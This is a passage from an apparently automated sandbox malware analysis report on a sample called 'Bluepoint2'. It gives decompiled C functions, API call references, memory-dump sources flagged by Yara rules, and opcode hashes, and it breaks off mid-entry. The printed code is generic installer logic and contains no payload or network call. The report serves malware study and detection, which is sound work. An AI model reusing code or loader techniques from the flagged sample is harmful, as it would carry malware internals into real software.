                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                    • String ID: A$C:\Users\user\AppData\Local\Temp$Call$H7B
                                                                                                                                    • API String ID: 2624150263-3840399979
                                                                                                                                    • Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                                                                                                    • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                                                                                                                                    • Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                                                                                                    • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0336D7F8 Relevance: 1.9, Strings: 1, Instructions: 695COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84107890317.0000000003350000.00000040.00001000.00020000.00000000.sdmp, Offset: 03350000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_3350000_Bluepoint2.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LibraryLoadMemoryProtectVirtual
                                                                                                                                    • String ID: exm0
                                                                                                                                    • API String ID: 3389902171-2178204803
                                                                                                                                    • Opcode ID: e117efd8bdc1882eedb8d84a6ef13ee2fcc8b37ce9977a11253ec5b6f016ac38
                                                                                                                                    • Instruction ID: 80526b7c50c5003748d8be3a32ec985c16f7e79baf537acfce2ad0f73704ff0e
                                                                                                                                    • Opcode Fuzzy Hash: e117efd8bdc1882eedb8d84a6ef13ee2fcc8b37ce9977a11253ec5b6f016ac38
                                                                                                                                    • Instruction Fuzzy Hash: C65208756083C68FCB35DF38C9D87DA7BA2AF12350F49829ACC958F69AD3348546C712
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004021AA Relevance: 1.6, APIs: 1, Instructions: 129comCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 67%
                                                                                                                                    			E004021AA() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x436000);
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                                                                                                                                    0x004021b3
                                                                                                                                    0x004021bd
                                                                                                                                    0x004021c7
                                                                                                                                    0x004021d1
                                                                                                                                    0x004021dc
                                                                                                                                    0x004021df
                                                                                                                                    0x004021f9
                                                                                                                                    0x004021fc
                                                                                                                                    0x00402202
                                                                                                                                    0x00402205
                                                                                                                                    0x0040220f
                                                                                                                                    0x00402213
                                                                                                                                    0x00402213
                                                                                                                                    0x00402218
                                                                                                                                    0x00402229
                                                                                                                                    0x00402231
                                                                                                                                    0x004022e8
                                                                                                                                    0x004022e8
                                                                                                                                    0x004022ef
                                                                                                                                    0x00402237
                                                                                                                                    0x00402237
                                                                                                                                    0x00402246
                                                                                                                                    0x0040224a
                                                                                                                                    0x0040224d
                                                                                                                                    0x00402253
                                                                                                                                    0x00402261
                                                                                                                                    0x00402264
                                                                                                                                    0x00402266
                                                                                                                                    0x00402271
                                                                                                                                    0x00402271
                                                                                                                                    0x00402276
                                                                                                                                    0x00402278
                                                                                                                                    0x0040227f
                                                                                                                                    0x0040227f
                                                                                                                                    0x00402282
                                                                                                                                    0x0040228b
                                                                                                                                    0x0040228e
                                                                                                                                    0x00402294
                                                                                                                                    0x00402296
                                                                                                                                    0x004022a0
                                                                                                                                    0x004022a0
                                                                                                                                    0x004022a3
                                                                                                                                    0x004022ac
                                                                                                                                    0x004022af
                                                                                                                                    0x004022b8
                                                                                                                                    0x004022be
                                                                                                                                    0x004022c0
                                                                                                                                    0x004022ce
                                                                                                                                    0x004022ce
                                                                                                                                    0x004022d1
                                                                                                                                    0x004022d7
                                                                                                                                    0x004022d7
                                                                                                                                    0x004022da
                                                                                                                                    0x004022e0
                                                                                                                                    0x004022e6
                                                                                                                                    0x004022fb
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004022e6
                                                                                                                                    0x004022f1
                                                                                                                                    0x00402c2d
                                                                                                                                    0x00402c39

                                                                                                                                    APIs
                                                                                                                                    • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateInstance
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 542301482-0
                                                                                                                                    • Opcode ID: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                                                                                                                    • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                                                                                                                                    • Opcode Fuzzy Hash: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                                                                                                                    • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0336262C Relevance: 1.6, Strings: 1, Instructions: 354COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84107890317.0000000003350000.00000040.00001000.00020000.00000000.sdmp, Offset: 03350000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_3350000_Bluepoint2.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: {7Wv
                                                                                                                                    • API String ID: 0-4039250958
                                                                                                                                    • Opcode ID: a0c117efd63ebfbae3d1ab7353a143cd9af56580e358f9869b20a072026253e8
                                                                                                                                    • Instruction ID: 605e5fc870959c0fe44b721c82ac14d358bd2da0d1c51b4d5ab2fd84904de27d
                                                                                                                                    • Opcode Fuzzy Hash: a0c117efd63ebfbae3d1ab7353a143cd9af56580e358f9869b20a072026253e8
                                                                                                                                    • Instruction Fuzzy Hash: A2C188716083459FCB388E78CC983EA7BA6EF55390F55852EDCC6DB649D7308986CB02
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 39%
                                                                                                                                    			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E00406668();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                                                                                                                                    0x00402923
                                                                                                                                    0x0040293e
                                                                                                                                    0x00402949
                                                                                                                                    0x0040294a
                                                                                                                                    0x00402a94
                                                                                                                                    0x00402925
                                                                                                                                    0x00402928
                                                                                                                                    0x0040292b
                                                                                                                                    0x0040292e
                                                                                                                                    0x0040292e
                                                                                                                                    0x00402c2d
                                                                                                                                    0x00402c39

                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1974802433-0
                                                                                                                                    • Opcode ID: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                                                                                                                    • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                                                                                                                                    • Opcode Fuzzy Hash: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                                                                                                                    • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0335FF07 Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84107890317.0000000003350000.00000040.00001000.00020000.00000000.sdmp, Offset: 03350000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_3350000_Bluepoint2.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: +8
                                                                                                                                    • API String ID: 0-241867450
                                                                                                                                    • Opcode ID: b70c326172bb7a29904c772c6b4e5d018e5d7c6c3dce266f0ef7f136cc6c4dd9
                                                                                                                                    • Instruction ID: 26cc1e6aafa591f2d4350e2aa8ca56243ddb1f91eddd62863194c714f1c4a980
                                                                                                                                    • Opcode Fuzzy Hash: b70c326172bb7a29904c772c6b4e5d018e5d7c6c3dce266f0ef7f136cc6c4dd9
                                                                                                                                    • Instruction Fuzzy Hash: FD51CB3180C689CFDB2ADF7488C96DAFFA5EF42240F6C4A9DD9E58B516C3754462CB40
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 033618A4 Relevance: 1.4, Strings: 1, Instructions: 147COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84107890317.0000000003350000.00000040.00001000.00020000.00000000.sdmp, Offset: 03350000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_3350000_Bluepoint2.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: H/z
                                                                                                                                    • API String ID: 0-4145708353
                                                                                                                                    • Opcode ID: e867d5d7bb59fa21c81d0c856d8b0c26c9ee7c39234d7ee2ef5c3ed5fa65e5bd
                                                                                                                                    • Instruction ID: 35206371b9776022e0ddc8f1d8d50a7dc1f4c45f859303f7ecbe0adeab5595c7
                                                                                                                                    • Opcode Fuzzy Hash: e867d5d7bb59fa21c81d0c856d8b0c26c9ee7c39234d7ee2ef5c3ed5fa65e5bd
                                                                                                                                    • Instruction Fuzzy Hash: 0C418A715083859FCB26DF34C8996EBBFA6EF85390F65855DDCC24B616C3704486CB42
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 03364C3B Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84107890317.0000000003350000.00000040.00001000.00020000.00000000.sdmp, Offset: 03350000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_3350000_Bluepoint2.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: |S
                                                                                                                                    • API String ID: 0-1649336978
                                                                                                                                    • Opcode ID: bd20c2d859af87013636e6bc563333d88feb02e77ff7d9b85f80731df44161c9
                                                                                                                                    • Instruction ID: 7afd75d8b99883403bb8f446e185b73d593c2185944cff863fc7e0511b78297f
                                                                                                                                    • Opcode Fuzzy Hash: bd20c2d859af87013636e6bc563333d88feb02e77ff7d9b85f80731df44161c9
                                                                                                                                    • Instruction Fuzzy Hash: C8418B70548385DFC726DF74C9896DABFA1EF51290F1985ADC9D14F667C330445ACB02
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 03361FE1 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84107890317.0000000003350000.00000040.00001000.00020000.00000000.sdmp, Offset: 03350000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_3350000_Bluepoint2.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: `
                                                                                                                                    • API String ID: 0-1850852036
                                                                                                                                    • Opcode ID: 130b2932dd7018d5e2eea14a5732b3b0f6c605a6c37486b6f92fab7e174d76d9
                                                                                                                                    • Instruction ID: d75942b60f2b275fe5db04e3c5a54b669491d47033d749c61b9278254b527958
                                                                                                                                    • Opcode Fuzzy Hash: 130b2932dd7018d5e2eea14a5732b3b0f6c605a6c37486b6f92fab7e174d76d9
                                                                                                                                    • Instruction Fuzzy Hash: AF41F235904BC98FDB39DE34CDA57DF36A2AB95360F86851ECC0A9B548C7348689CB02
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 03364FF9 Relevance: .3, Instructions: 297COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84107890317.0000000003350000.00000040.00001000.00020000.00000000.sdmp, Offset: 03350000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_3350000_Bluepoint2.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c3f97b7eee981187f692180d043098e1ade47cb2df0276510a24d2e6ce6899dc
                                                                                                                                    • Instruction ID: a5f98994a25dfb2b5fb42c46204e5e462582564292dfa763073866f29b37d0e3
                                                                                                                                    • Opcode Fuzzy Hash: c3f97b7eee981187f692180d043098e1ade47cb2df0276510a24d2e6ce6899dc
                                                                                                                                    • Instruction Fuzzy Hash: ADC1F33564434ACFDF35CE28C9947D937A6EF16354F98817ACC9A8FA05D3318A86CB01
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 033612F5 Relevance: .1, Instructions: 140COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84107890317.0000000003350000.00000040.00001000.00020000.00000000.sdmp, Offset: 03350000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_3350000_Bluepoint2.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0b63b96ec5c2b8694002eeb3de5c69d38389f4bd761322b25cb13c03f992f6c5
                                                                                                                                    • Instruction ID: 5f1d7ee4be94ecead4aa1352e8bc085d289b0a9a7497c8798019d8f63ed3c174
                                                                                                                                    • Opcode Fuzzy Hash: 0b63b96ec5c2b8694002eeb3de5c69d38389f4bd761322b25cb13c03f992f6c5
                                                                                                                                    • Instruction Fuzzy Hash: 3751DF75A0434A9FDB34DE68CCA0BEB37B6BF99790F41812DDC8E9B248D33149518B41
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 03361AAF Relevance: .1, Instructions: 123COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84107890317.0000000003350000.00000040.00001000.00020000.00000000.sdmp, Offset: 03350000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_3350000_Bluepoint2.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f0b8a6e1637902e786f6a42234ac8b004d337f2ab7ee1871c0fc47c7d42a2b64
                                                                                                                                    • Instruction ID: 7bf9dedffbe55c99fa43309df624f33021a20a57cea439ddd992532447e6fa51
                                                                                                                                    • Opcode Fuzzy Hash: f0b8a6e1637902e786f6a42234ac8b004d337f2ab7ee1871c0fc47c7d42a2b64
                                                                                                                                    • Instruction Fuzzy Hash: B6410536A043499FDF30AF298D917EA37B6BF85350F858529DC898F255DB344A818B41
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 033660A0 Relevance: .1, Instructions: 102COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84107890317.0000000003350000.00000040.00001000.00020000.00000000.sdmp, Offset: 03350000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_3350000_Bluepoint2.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8351f2ecea4c01a19f39c8d9ea93d3602bc21d9646d52185be303bcf1e68bd9e
                                                                                                                                    • Instruction ID: 9f9007a4ffe7729cbe82471366aa174a3d2a2a071e1fb61bb564c9114c197457
                                                                                                                                    • Opcode Fuzzy Hash: 8351f2ecea4c01a19f39c8d9ea93d3602bc21d9646d52185be303bcf1e68bd9e
                                                                                                                                    • Instruction Fuzzy Hash: 63317A7154C3858FC70A9F34C8494EBFFA1EF81690F29899DC9D24B627C37084AACB42
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0335E044 Relevance: .1, Instructions: 67COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84107890317.0000000003350000.00000040.00001000.00020000.00000000.sdmp, Offset: 03350000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_3350000_Bluepoint2.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                    • Opcode ID: 24f8a9df0c4c795aa48f8e64e451b00ca60358f716a768007c2637b9eccf3428
                                                                                                                                    • Instruction ID: 1ede75e256caa6256c4a97570b1a54be35cd440d592084e9cc7921da73c9651e
                                                                                                                                    • Opcode Fuzzy Hash: 24f8a9df0c4c795aa48f8e64e451b00ca60358f716a768007c2637b9eccf3428
                                                                                                                                    • Instruction Fuzzy Hash: 16117A396083C58FD316DE348594A96BF529FC6250F79088D9AD5CF907C7398A5BC702
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0336C431 Relevance: .0, Instructions: 49COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84107890317.0000000003350000.00000040.00001000.00020000.00000000.sdmp, Offset: 03350000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_3350000_Bluepoint2.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1faeb95205073eeaad435a2a68463dc9469f6abd55357c285b9929b38517893d
                                                                                                                                    • Instruction ID: 0a1d666c7233efd4f6a700153d8f4cd49f82c676fee71598a4f25799d8ff547e
                                                                                                                                    • Opcode Fuzzy Hash: 1faeb95205073eeaad435a2a68463dc9469f6abd55357c285b9929b38517893d
                                                                                                                                    • Instruction Fuzzy Hash: B9118775718345CFCB29CF19C9E4BEA73B6AF18710F848079EA8E8F615C3309984CA25
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 03361F61 Relevance: .0, Instructions: 16COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84107890317.0000000003350000.00000040.00001000.00020000.00000000.sdmp, Offset: 03350000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_3350000_Bluepoint2.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c4dbf4defd43756dbf8ed5f615fc622c43c34525a4509c74b173df399ec330b1
                                                                                                                                    • Instruction ID: 90671a42ba0fd96aa13222aff04cab3c1f73a2b181ac98a3a3b0c078bf3ad57c
                                                                                                                                    • Opcode Fuzzy Hash: c4dbf4defd43756dbf8ed5f615fc622c43c34525a4509c74b173df399ec330b1
                                                                                                                                    • Instruction Fuzzy Hash: 1EC0805BC0D2559D89D6747437C01A91C3709D3164B44D7902C495F54EEF5C4DA61141
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0336BCEC Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84107890317.0000000003350000.00000040.00001000.00020000.00000000.sdmp, Offset: 03350000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_3350000_Bluepoint2.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
                                                                                                                                    • Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
